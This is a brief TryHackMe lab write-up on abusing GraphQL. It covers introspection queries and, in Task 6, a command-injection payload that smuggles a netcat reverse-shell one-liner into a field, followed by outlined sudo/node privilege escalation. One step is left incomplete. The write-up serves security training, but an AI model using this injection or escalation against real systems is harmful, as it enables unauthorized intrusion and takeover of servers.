GraphQL — TryHackMe(Write-up)

The purpose of this room is to show how a malicious user could use GraphQL to perform unintended actions. You will get the most out of…

The purpose of this room is to show how a malicious user could use GraphQL to perform unintended actions. You will get the most out of this room if you have some programming experience, as code examples will be shown.


Some Basics

GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL provides a complete and understandable description of the data in your API, gives clients the power to ask for exactly what they need and nothing more, makes it easier to evolve APIs over time, and enables powerful developer tools.

A query language for your API
GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL…

Tasks

Tasks 1–2 are just reading and knowing the environment.

Task 3:

query will be like : { Dog(name: “<?>”){ <?> } }

Task 4:

We can use the build in object _type to do this, we use the name parameter to specify which type we want more information on. From there we can query what the fields are for whatever type we can specify, and then we can get the name of all of those fields.

query will be like : { __type(name: “<?>”){ fields { <?>} } }

Task 6:

let’s try some injection…

  1. To get a reverse shell, use the payload: “127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f”
  2. Once you get the shell, do the priv. esc.

3. replace server.js with,

4. sudo -u root /usr/bin/node /home/para/server.js

5. Go and get the flag


More Information

  1. https://www.exploit-db.com/docs/49728